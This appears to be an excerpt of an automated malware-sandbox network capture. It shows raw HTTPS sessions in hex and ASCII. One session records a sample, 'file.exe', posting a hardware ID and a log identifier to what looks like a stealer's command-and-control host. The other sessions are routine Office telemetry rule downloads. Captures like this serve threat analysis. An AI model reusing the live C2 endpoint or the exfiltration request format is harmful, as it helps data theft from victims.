                                                                                                                                                                                  CF-RAY: 8e735b126cc580d9-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=23633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1737061&cwnd=252&unsent_bytes=0&cid=d7ed598856369f06&ts=779&x=0"
                                                                                                                                                                                  2024-11-23 18:52:20 UTC345INData Raw: 32 35 39 32 0d 0a 78 70 33 4c 6e 47 6d 52 7a 69 55 32 6e 63 75 68 38 44 6a 74 66 73 62 32 78 6c 48 37 58 78 55 73 66 74 7a 66 4b 34 49 6c 74 41 71 39 76 37 32 2b 55 36 58 69 42 30 58 34 36 5a 75 45 53 70 67 62 36 74 53 6e 4e 64 6c 6c 63 30 30 53 72 37 6f 48 6f 46 50 5a 4b 50 7a 37 71 76 41 61 39 4f 49 48 55 2b 58 70 6d 36 74 44 7a 78 75 6f 31 50 78 7a 6e 6a 56 33 54 52 4b 2b 76 6b 44 74 56 64 68 70 72 76 47 73 39 41 7a 79 71 6b 52 61 38 4b 37 45 6c 56 6d 48 45 4b 2b 62 72 6a 7a 5a 63 7a 64 4a 42 50 37 6c 43 63 39 41 77 47 75 4c 2f 4c 6a 33 53 2b 7a 69 58 68 54 34 70 59 50 4b 47 6f 77 62 70 4a 71 67 4e 5a 41 33 66 55 51 61 76 37 74 42 38 6b 7a 53 59 71 37 2f 72 2f 55 47 2b 37 35 4a 55 50 65 6c 77 70 39 5a 7a 31 4c 6b 6b 37 78 7a 77 58 30 6b 66 42 2b 76 72
                                                                                                                                                                                  Data Ascii: 2592xp3LnGmRziU2ncuh8Djtfsb2xlH7XxUsftzfK4IltAq9v72+U6XiB0X46ZuESpgb6tSnNdllc00Sr7oHoFPZKPz7qvAa9OIHU+Xpm6tDzxuo1PxznjV3TRK+vkDtVdhprvGs9AzyqkRa8K7ElVmHEK+brjzZczdJBP7lCc9AwGuL/Lj3S+ziXhT4pYPKGowbpJqgNZA3fUQav7tB8kzSYq7/r/UG+75JUPelwp9Zz1Lkk7xzwX0kfB+vr
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1369INData Raw: 61 4b 50 79 2f 72 2f 41 4b 2f 71 78 56 58 50 53 69 78 6f 42 52 68 68 47 70 6c 4b 6b 35 6c 6a 35 33 53 52 61 30 73 6b 50 6b 53 74 74 75 70 50 2f 70 73 45 76 30 74 41 63 4d 76 34 72 47 67 6c 32 44 43 75 61 75 35 43 7a 58 4a 44 64 4a 45 50 37 6c 43 65 68 43 31 57 75 76 38 4b 72 32 41 4f 47 73 56 56 4c 79 72 4e 47 55 58 34 45 57 70 34 61 75 50 5a 38 2b 66 6b 55 56 75 37 70 4e 6f 41 6d 57 62 37 79 2f 38 62 34 71 2f 71 64 4c 58 75 69 70 67 34 30 55 6c 6c 79 6a 6d 4f 52 72 32 54 6c 32 53 68 32 36 73 30 66 6b 53 39 42 6d 71 66 43 76 39 41 76 30 70 6b 39 63 2f 71 54 49 6e 56 71 4b 45 61 43 53 71 44 4b 63 66 54 6b 4f 47 36 62 39 45 61 42 70 30 57 75 32 76 5a 7a 39 42 66 32 72 55 52 54 67 35 39 72 53 58 59 4e 63 2f 4e 53 71 4e 70 59 76 64 6c 77 5a 73 4b 39 46 35 55
                                                                                                                                                                                  Data Ascii: aKPy/r/AK/qxVXPSixoBRhhGplKk5lj53SRa0skPkSttupP/psEv0tAcMv4rGgl2DCuau5CzXJDdJEP7lCehC1Wuv8Kr2AOGsVVLyrNGUX4EWp4auPZ8+fkUVu7pNoAmWb7y/8b4q/qdLXuipg40UllyjmORr2Tl2Sh26s0fkS9BmqfCv9Av0pk9c/qTInVqKEaCSqDKcfTkOG6b9EaBp0Wu2vZz9Bf2rURTg59rSXYNc/NSqNpYvdlwZsK9F5U
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1369INData Raw: 76 5a 7a 39 42 66 32 72 55 52 54 67 35 39 72 53 58 59 4e 63 2f 4e 53 6f 4f 70 6b 32 66 55 6f 63 75 62 42 4d 34 30 44 56 5a 61 50 31 70 2f 6b 50 2f 36 56 4b 55 76 2b 75 78 35 64 49 69 68 57 6f 6d 4f 52 39 32 54 70 76 44 6b 54 2b 6b 6b 37 32 52 50 6c 72 74 66 62 70 34 55 58 71 37 45 42 59 76 2f 47 44 6c 56 2b 48 46 36 4b 63 70 43 47 63 4d 33 78 50 46 72 69 38 52 4f 78 42 31 6d 6d 6b 2b 61 58 2b 44 50 53 2b 56 56 48 35 75 38 6e 53 46 4d 38 62 76 4e 54 38 63 36 38 74 59 46 38 4b 2f 49 68 4b 37 6b 6e 52 66 75 54 67 35 2b 64 4c 39 4b 41 48 44 4c 2b 69 77 35 35 64 68 78 71 67 6e 4b 73 38 6b 43 39 32 51 68 4b 73 75 6b 6e 70 53 64 6c 6b 72 66 4b 75 38 77 44 35 6f 55 4e 54 2f 75 6d 4e 30 6c 32 58 58 50 7a 55 6b 69 4f 55 4d 56 6c 46 45 4c 66 39 56 71 35 65 6c 6d 2b
                                                                                                                                                                                  Data Ascii: vZz9Bf2rURTg59rSXYNc/NSoOpk2fUocubBM40DVZaP1p/kP/6VKUv+ux5dIihWomOR92TpvDkT+kk72RPlrtfbp4UXq7EBYv/GDlV+HF6KcpCGcM3xPFri8ROxB1mmk+aX+DPS+VVH5u8nSFM8bvNT8c68tYF8K/IhK7knRfuTg5+dL9KAHDL+iw55dhxqgnKs8kC92QhKsuknpSdlkrfKu8wD5oUNT/umN0l2XXPzUkiOUMVlFELf9Vq5elm+
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1369INData Raw: 67 50 79 6f 6b 68 56 2b 36 7a 47 6c 6c 32 4c 47 71 76 55 36 6e 4f 65 4a 54 63 57 58 4a 47 61 66 4b 4a 6d 37 43 69 37 73 62 43 2b 44 50 2f 73 48 78 54 7a 71 73 2b 61 56 59 6b 56 71 4a 36 74 4f 4a 55 32 63 30 49 56 75 37 74 49 35 55 4c 58 62 4b 6a 31 72 2f 30 49 2f 4b 4e 49 58 4c 2f 6e 67 35 56 43 7a 30 54 6b 73 62 4d 34 6c 7a 73 33 55 56 4b 6e 2f 55 37 73 42 34 34 6f 71 50 61 76 2b 41 37 2f 72 55 46 63 2b 71 48 48 6b 31 79 4a 48 36 75 51 6f 54 4b 57 4f 58 74 41 46 72 2b 38 52 65 74 49 33 57 33 6b 73 65 6e 35 45 37 50 30 42 32 58 38 76 39 53 43 56 73 38 44 36 6f 33 6b 4e 4a 56 39 4c 77 34 64 72 4c 64 44 37 6b 4c 5a 62 61 66 77 72 76 4d 4e 2f 36 5a 4f 58 50 6d 6d 79 6f 42 5a 67 78 4b 6a 6d 71 67 39 6c 44 64 30 51 31 7a 77 2f 55 37 34 42 34 34 6f 69 50 69 6b
                                                                                                                                                                                  Data Ascii: gPyokhV+6zGll2LGqvU6nOeJTcWXJGafKJm7Ci7sbC+DP/sHxTzqs+aVYkVqJ6tOJU2c0IVu7tI5ULXbKj1r/0I/KNIXL/ng5VCz0TksbM4lzs3UVKn/U7sB44oqPav+A7/rUFc+qHHk1yJH6uQoTKWOXtAFr+8RetI3W3ksen5E7P0B2X8v9SCVs8D6o3kNJV9Lw4drLdD7kLZbafwrvMN/6ZOXPmmyoBZgxKjmqg9lDd0Q1zw/U74B44oiPik
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1369INData Raw: 4a 56 55 65 32 37 67 39 77 61 69 41 54 6b 7a 4f 51 46 6e 69 31 6e 54 56 36 50 71 30 72 32 54 4e 74 6b 35 4f 44 6e 35 30 76 30 6f 41 63 4d 76 36 2f 4d 6d 31 6d 41 48 61 32 59 71 54 61 51 4f 48 5a 49 47 4c 53 33 53 65 5a 42 31 32 32 75 2f 4b 6a 30 41 76 53 6b 51 46 66 74 36 59 33 53 58 5a 64 63 2f 4e 53 4e 4e 49 73 7a 5a 77 34 44 38 4b 51 4a 35 30 75 57 4d 4f 54 37 6f 2f 45 50 39 4b 42 42 55 66 6d 6b 77 70 31 62 6a 78 4f 67 6e 36 30 31 6d 44 42 79 51 78 69 73 74 30 4c 76 53 39 39 6b 71 62 2f 6e 76 67 7a 72 37 42 38 55 7a 71 54 4e 6e 46 32 5a 58 4c 76 61 76 58 4f 65 4d 54 63 57 58 4c 2b 78 52 75 4e 49 31 57 75 6c 39 62 76 73 42 2f 71 6b 51 6c 6a 30 70 38 57 41 58 49 41 56 70 35 65 74 4e 4a 45 78 66 55 30 62 2f 76 4d 4a 35 31 2b 57 4d 4f 54 63 76 75 34 47 73
                                                                                                                                                                                  Data Ascii: JVUe27g9waiATkzOQFni1nTV6Pq0r2TNtk5ODn50v0oAcMv6/Mm1mAHa2YqTaQOHZIGLS3SeZB122u/Kj0AvSkQFft6Y3SXZdc/NSNNIszZw4D8KQJ50uWMOT7o/EP9KBBUfmkwp1bjxOgn601mDByQxist0LvS99kqb/nvgzr7B8UzqTNnF2ZXLvavXOeMTcWXL+xRuNI1Wul9bvsB/qkQlj0p8WAXIAVp5etNJExfU0b/vMJ51+WMOTcvu4Gs
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1369INData Raw: 2f 72 38 71 55 58 59 6b 53 74 70 47 69 50 4a 59 30 66 6b 6f 55 76 62 31 4e 35 45 44 54 61 36 6a 30 72 76 30 45 39 36 56 4a 58 66 44 70 6a 64 4a 64 6c 31 7a 38 31 49 55 6f 6d 6a 46 36 44 67 50 77 70 41 6e 6e 53 35 59 77 35 50 4f 6e 2b 77 76 35 71 6b 4e 52 2b 61 50 47 6b 6c 47 4d 45 36 43 53 6f 44 79 5a 4e 6e 35 50 47 72 75 33 51 75 5a 4b 31 57 36 69 76 2b 65 2b 44 4f 76 73 48 78 54 66 73 73 36 65 58 63 38 44 36 6f 33 6b 4e 4a 56 39 4c 77 34 58 73 72 6c 4f 34 45 72 56 59 4b 48 37 6f 2f 73 4c 2b 37 35 50 56 50 69 37 30 5a 4a 54 69 68 43 6e 6c 4b 41 31 6b 44 74 30 53 6c 7a 77 2f 55 37 34 42 34 34 6f 69 66 4f 75 31 77 7a 6f 37 46 67 61 35 75 6e 45 6e 68 72 58 58 4b 57 66 72 6a 79 55 50 6e 46 4e 46 37 75 33 53 4f 64 50 32 33 71 6e 38 4b 62 36 43 2f 79 71 51 56
                                                                                                                                                                                  Data Ascii: /r8qUXYkStpGiPJY0fkoUvb1N5EDTa6j0rv0E96VJXfDpjdJdl1z81IUomjF6DgPwpAnnS5Yw5POn+wv5qkNR+aPGklGME6CSoDyZNn5PGru3QuZK1W6iv+e+DOvsHxTfss6eXc8D6o3kNJV9Lw4XsrlO4ErVYKH7o/sL+75PVPi70ZJTihCnlKA1kDt0Slzw/U74B44oifOu1wzo7Fga5unEnhrXXKWfrjyUPnFNF7u3SOdP23qn8Kb6C/yqQV
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1369INData Raw: 67 46 79 4d 43 71 66 54 6d 67 32 2b 4b 33 31 4a 44 4c 6d 71 52 71 41 4a 6c 6d 66 6b 70 35 43 2b 41 76 53 33 56 6b 4c 79 75 63 54 53 5a 63 46 63 76 4e 54 38 63 36 77 2b 65 55 41 62 71 4b 77 45 78 31 48 63 62 37 54 34 76 76 46 4c 76 65 78 42 46 4b 66 36 6a 64 4a 65 6e 6c 7a 38 78 50 5a 6f 7a 47 34 67 48 6b 36 68 38 31 43 67 55 5a 59 77 39 72 48 70 37 45 75 72 37 41 42 58 37 62 76 46 6b 55 79 4d 57 35 71 71 67 79 6d 55 4f 32 42 66 49 6f 43 36 55 2b 31 42 77 58 6e 6f 36 71 72 77 42 66 53 36 42 78 71 2f 70 6f 50 4b 59 38 39 55 35 4b 76 71 63 34 46 39 4c 77 34 70 76 62 4e 48 35 31 48 48 4a 59 50 6c 70 50 67 63 34 75 77 4a 46 50 6e 70 6d 38 49 55 7a 78 69 31 31 50 78 6a 79 32 59 69 48 55 76 75 37 31 61 75 58 70 5a 2b 35 4b 66 37 73 45 76 68 37 42 38 55 75 4b 72
                                                                                                                                                                                  Data Ascii: gFyMCqfTmg2+K31JDLmqRqAJlmfkp5C+AvS3VkLyucTSZcFcvNT8c6w+eUAbqKwEx1Hcb7T4vvFLvexBFKf6jdJenlz8xPZozG4gHk6h81CgUZYw9rHp7Eur7ABX7bvFkUyMW5qqgymUO2BfIoC6U+1BwXno6qrwBfS6Bxq/poPKY89U5Kvqc4F9Lw4pvbNH51HHJYPlpPgc4uwJFPnpm8IUzxi11Pxjy2YiHUvu71auXpZ+5Kf7sEvh7B8UuKr
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1067INData Raw: 31 79 62 32 75 51 72 32 57 55 33 65 78 2b 77 73 30 37 32 56 70 74 50 71 76 69 6f 36 42 76 6b 6f 77 63 61 76 36 2b 44 79 67 6a 42 58 4b 43 46 35 47 76 4a 62 79 77 62 54 2b 6e 74 47 2f 38 4a 7a 79 69 79 76 2f 47 73 52 62 4f 2b 42 77 79 2f 37 73 43 41 53 49 6b 66 73 70 66 6a 44 61 63 61 65 55 6b 64 71 4b 31 65 37 77 6a 34 58 6f 58 42 6c 2b 73 49 2f 61 4a 41 51 75 37 70 6a 64 4a 56 7a 30 53 64 31 4f 78 7a 70 6e 4d 33 56 6c 7a 6d 2f 58 7a 6a 53 64 68 76 73 75 37 6b 32 51 58 30 72 56 46 45 36 4b 61 4d 76 47 79 75 58 4f 72 55 6f 6e 50 42 62 7a 6b 4f 47 4b 2f 39 45 62 41 56 6a 54 33 33 71 50 6d 73 46 4c 32 31 42 30 4b 2f 38 5a 48 63 47 70 31 63 2f 4e 54 6a 4d 49 73 76 63 55 30 4b 76 66 70 33 33 6d 44 59 62 36 58 70 75 66 4d 48 30 71 39 57 58 73 47 58 31 70 46 55
                                                                                                                                                                                  Data Ascii: 1yb2uQr2WU3ex+ws072VptPqvio6Bvkowcav6+DygjBXKCF5GvJbywbT+ntG/8Jzyiyv/GsRbO+Bwy/7sCASIkfspfjDacaeUkdqK1e7wj4XoXBl+sI/aJAQu7pjdJVz0Sd1OxzpnM3Vlzm/XzjSdhvsu7k2QX0rVFE6KaMvGyuXOrUonPBbzkOGK/9EbAVjT33qPmsFL21B0K/8ZHcGp1c/NTjMIsvcU0Kvfp33mDYb6XpufMH0q9WXsGX1pFU
                                                                                                                                                                                  2024-11-23 18:52:20 UTC1369INData Raw: 31 65 64 61 0d 0a 6e 42 58 4c 62 55 2f 48 50 65 4d 33 70 50 48 37 43 2b 57 2f 4a 42 31 58 36 6e 75 4a 66 41 4c 76 36 68 51 6c 72 34 6c 2f 32 7a 55 4a 38 52 71 35 50 6d 45 35 34 72 64 48 41 69 69 61 78 4f 38 41 58 77 61 37 4c 38 36 62 42 4c 36 2b 77 66 46 4e 36 6a 30 35 39 56 69 46 36 45 6b 37 49 77 32 58 4d 33 53 6c 7a 6d 2f 57 7a 74 53 74 4e 6d 6f 37 32 49 39 42 76 2b 6f 30 41 57 33 36 37 56 6b 52 72 42 58 4b 6a 55 2f 48 4f 59 4e 32 64 44 45 37 6e 78 54 76 70 41 6c 69 62 6b 38 65 6d 6d 53 2f 4b 6d 56 31 6e 77 72 6f 2b 55 56 49 46 63 75 39 71 39 63 34 39 39 4c 78 31 53 2f 71 38 4a 75 41 65 52 61 37 62 74 72 2f 30 64 38 4f 74 35 61 74 4b 37 78 49 4a 5a 7a 53 32 70 6b 4c 49 6d 6d 69 31 77 63 43 4b 54 72 30 37 77 52 4a 52 5a 73 76 79 70 38 41 79 7a 34 67 64
                                                                                                                                                                                  Data Ascii: 1edanBXLbU/HPeM3pPH7C+W/JB1X6nuJfALv6hQlr4l/2zUJ8Rq5PmE54rdHAiiaxO8AXwa7L86bBL6+wfFN6j059ViF6Ek7Iw2XM3Slzm/WztStNmo72I9Bv+o0AW367VkRrBXKjU/HOYN2dDE7nxTvpAlibk8emmS/KmV1nwro+UVIFcu9q9c499Lx1S/q8JuAeRa7btr/0d8Ot5atK7xIJZzS2pkLImmi1wcCKTr07wRJRZsvyp8Ayz4gd


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.749709104.21.33.1164436908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:22 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=7ARUGZ3H
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 12790
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 18:52:22 UTC12790OUTData Raw: 2d 2d 37 41 52 55 47 5a 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 39 38 37 42 32 38 45 37 34 32 44 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 37 41 52 55 47 5a 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 41 52 55 47 5a 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 37 41 52 55 47 5a 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                  Data Ascii: --7ARUGZ3HContent-Disposition: form-data; name="hwid"0C43B987B28E742DD7CBBD6DF28D3732--7ARUGZ3HContent-Disposition: form-data; name="pid"2--7ARUGZ3HContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--7ARUGZ3HContent-Di
                                                                                                                                                                                  2024-11-23 18:52:23 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:23 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=i1b569lkiut58pd48g5a4akc3o; expires=Wed, 19-Mar-2025 12:39:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=06cChtH19D69oRdhkCgD%2F7%2B2TFW6mUyAxfjfnlSHJs8yZlJhU9W0%2Fg3jwwMR8GpeP3NjLKidDgYRC%2F56%2Bwzkzp5dL9pTn11QdtBajcpzj%2FAPnAHfBEdmmR68GwvBhR1FgUQapRY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e735b227ed3727d-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=14&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13722&delivery_rate=1574123&cwnd=207&unsent_bytes=0&cid=3afa8031b62838f7&ts=1253&x=0"
                                                                                                                                                                                  2024-11-23 18:52:23 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                  Data Ascii: eok 8.46.123.75
                                                                                                                                                                                  2024-11-23 18:52:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  4192.168.2.74970413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:22 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 3788
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                  ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                  x-ms-request-id: 44ae66ae-301e-001f-7627-3caa3a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185223Z-15b8b599d886w4hzhC1TEBb4ug000000039g00000000h9p1
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:23 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  5192.168.2.74970813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:22 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 408
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                  x-ms-request-id: a3d07856-b01e-0084-3a7e-3bd736000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185223Z-174c587ffdfx984chC1TEB676g00000003d0000000003nz2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:23 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  6192.168.2.74970713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:22 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 2980
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                  x-ms-request-id: 89a9fa5c-d01e-0017-5438-3cb035000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185223Z-178bfbc474bbcwv4hC1NYCypys00000004tg000000002xnm
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:23 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


